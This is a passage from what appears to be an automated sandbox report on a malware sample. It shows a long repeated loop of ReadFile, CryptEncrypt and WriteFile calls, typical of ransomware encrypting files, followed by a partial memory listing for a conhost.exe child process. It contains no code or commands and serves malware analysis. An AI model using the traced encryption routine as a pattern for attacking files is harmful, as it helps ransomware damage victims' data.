lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.973] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.973] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.973] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.974] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.974] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.974] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.974] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.974] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.974] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.974] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.974] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.974] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.974] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.974] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.974] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.974] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.974] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.975] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.975] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.975] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.975] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.975] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.975] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.975] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.975] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.975] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.975] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.975] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.975] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.975] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.976] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.976] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.976] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.976] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.976] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.976] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.976] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.976] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.976] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.976] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.976] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.976] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.976] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.976] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.977] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.977] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.977] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.977] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.977] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.977] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.977] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.977] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.977] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.978] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.978] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.978] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.978] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.978] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.978] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.978] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.978] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.978] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.978] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.978] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.978] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.978] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.978] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.978] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.979] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.979] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.979] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.979] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.979] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.979] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.979] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.979] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.979] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.979] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.979] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.979] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.979] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.979] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.979] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.979] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.979] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.979] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.980] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.980] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.980] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 Process: id = "2" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x30d13000" os_pid = "0x128" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x56c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00014ee5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 165 start_va = 0x7fd48000 end_va = 0x7fd48fff entry_point = 0x0 region_type = private name = "private_0x000000007fd48000" filename = "" Region: id = 166 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 167 start_va = 0xb39fd0000 end_va = 0xb39feffff entry_point = 0x0 region_type = private name = "private_0x0000000b39fd0000" filename = "" Region: id = 168 start_va = 0xb39ff0000 end_va = 0xb3a003fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000b39ff0000" filename = "" Region: id = 169 start_va = 0xb3a010000 end_va = 0xb3a04ffff entry_point = 0x0 region_type = private name = "private_0x0000000b3a010000" filename = "" Region: id = 170 start_va = 0x7df5ffbe0000 end_va = 0x7ff5ffbdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffbe0000" filename = "" Region: id = 171 start_va = 0x7ff71e910000 end_va = 0x7ff71e932fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff71e910000" filename = "" Region: id = 172 start_va = 0x7ff71e936000 end_va = 0x7ff71e936fff entry_point = 0x0 region_type = private name = "private_0x00007ff71e936000" filename = "" Region: id = 173 start_va = 0x7ff71e93e000 end_va = 0x7ff71e93ffff entry_point = 0x0 region_type = 